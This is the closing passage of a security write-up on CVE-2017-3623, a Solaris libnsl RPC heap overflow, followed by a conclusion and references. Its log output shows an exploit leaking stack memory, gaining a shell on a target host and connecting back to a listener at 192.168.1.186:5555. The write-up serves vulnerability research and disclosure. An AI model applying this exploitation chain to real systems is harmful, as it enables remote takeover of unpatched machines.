2017-06-26 17:50:50,366 [ solaris_rpc_libnsl_ng2.py] - INFO - [+] libnsl is loaded at 0xfef80000
2017-06-26 17:50:50,366 [ solaris_rpc_libnsl_ng2.py] - INFO - [+] Trying to find the ret2ld payload
2017-06-26 17:50:57,920 [ solaris_rpc_libnsl_ng2.py] - INFO - [+] Found the payload!
2017-06-26 17:50:57,922 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Found ret2addr payload at 0x080aa828
2017-06-26 17:50:57,923 [ solaris_rpc_libnsl_ng2.py] - INFO - [+] Trying to find the STACK
2017-06-26 17:50:57,923 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Trying to leak [0x08046000, 0x080467ff]
2017-06-26 17:50:59,811 [ solaris_rpc_libnsl_ng2.py] - INFO - -> OK we could leak 2048 bytes at 08046000
2017-06-26 17:51:00,314 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Trying to leak [0x08046800, 0x08046fff]
2017-06-26 17:51:02,198 [ solaris_rpc_libnsl_ng2.py] - INFO - -> OK we could leak 2048 bytes at 08046800
2017-06-26 17:51:02,700 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Trying to leak [0x08047000, 0x080477ff]
2017-06-26 17:51:04,590 [ solaris_rpc_libnsl_ng2.py] - INFO - -> OK we could leak 2048 bytes at 08047000
2017-06-26 17:51:05,092 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Trying to leak [0x08047800, 0x08047bff]
2017-06-26 17:51:06,989 [ solaris_rpc_libnsl_ng2.py] - INFO - -> OK we could leak 1024 bytes at 08047800
2017-06-26 17:51:07,491 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Trying to leak [0x08047c00, 0x08047dff]
2017-06-26 17:51:09,387 [ solaris_rpc_libnsl_ng2.py] - INFO - -> OK we could leak 512 bytes at 08047c00
2017-06-26 17:51:09,889 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Trying to leak [0x08047e00, 0x08047e7f]
2017-06-26 17:51:11,778 [ solaris_rpc_libnsl_ng2.py] - INFO - -> OK we could leak 128 bytes at 08047e00
2017-06-26 17:51:12,280 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Trying to leak [0x08047e80, 0x08047eff]
2017-06-26 17:51:14,167 [ solaris_rpc_libnsl_ng2.py] - INFO - -> OK we could leak 128 bytes at 08047e80
2017-06-26 17:51:14,670 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Trying to leak [0x08047f00, 0x08047f1f]
2017-06-26 17:51:16,556 [ solaris_rpc_libnsl_ng2.py] - INFO - -> OK we could leak 32 bytes at 08047f00
2017-06-26 17:51:17,059 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Trying to leak [0x08047f20, 0x08047f3f]
2017-06-26 17:51:18,946 [ solaris_rpc_libnsl_ng2.py] - INFO - -> OK we could leak 32 bytes at 08047f20
2017-06-26 17:51:19,449 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Trying to leak [0x08047f40, 0x08047f5f]
2017-06-26 17:51:21,337 [ solaris_rpc_libnsl_ng2.py] - INFO - -> OK we could leak 32 bytes at 08047f40
2017-06-26 17:51:21,839 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Trying to leak [0x08047f60, 0x08047f7f]
2017-06-26 17:51:23,727 [ solaris_rpc_libnsl_ng2.py] - INFO - -> OK we could leak 32 bytes at 08047f60
2017-06-26 17:51:24,229 [ solaris_rpc_libnsl_ng2.py] - INFO - [+] Analyzing the stack [0x08046000, 0x08047f7f]
2017-06-26 17:51:24,252 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Found LD_DATA at 0xfeffb000
2017-06-26 17:51:24,254 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Found our target FP copy at 0x08047d04
2017-06-26 17:51:24,254 [ solaris_rpc_libnsl_ng2.py] - INFO - The infoleak is a success, let's try to get the shell now!
2017-06-26 17:51:24,254 [ solaris_rpc_libnsl_ng2.py] - INFO - Trying first with saved_ebp = 08047d04
2017-06-26 17:51:26,188 [ solaris_rpc_libnsl_ng2.py] - INFO - Got a shell!
2017-06-26 17:51:26,188 [ solaris_rpc_libnsl_ng2.py] - INFO - Solaris libnsl (RPC) - Remote Heap Overflow attacking 192.168.1.147:33583 (succeeded!)
2017-06-26 17:51:26,188 [ solaris_rpc_libnsl_ng2.py] - INFO - Solaris libnsl (RPC) - Remote Heap Overflow done (Success!)
2017-06-26 17:51:26,188 [ exploitutils.py] - INFO - done -- connectback set to 192.168.1.186:5555


6. Conclusion



CVE-2017-3623 is a very interesting bug and has a huge potential. While Solaris 10 itself is poorly protected (needless to mention older versions), practical exploitation conditions require creativity in order to achieve reliable exploitation. Nothing new there of course as it has been done for decades [P61JP] even before ASLR. It is none the less a good example of why sometimes you may want to do more than hardcoding offsets. And of course there would be much more to say as bootparams is just one possible process to exploit. Remember that the bug is in libnsl.so!

7. References


[CORE] “Solaris Internals, Core Kernel Components”, Jim Mauro and Richard McDougall
[F1] “Linux/doc/old/etc/user.tool.ebbisland.COMMON” from the EQGRP repository
[F2] “Linux/etc/opscript.txt” from the EQGRP repository
[OPENSOL] git://repo.or.cz/opensolaris.git




Author: El SeƱor Ricardo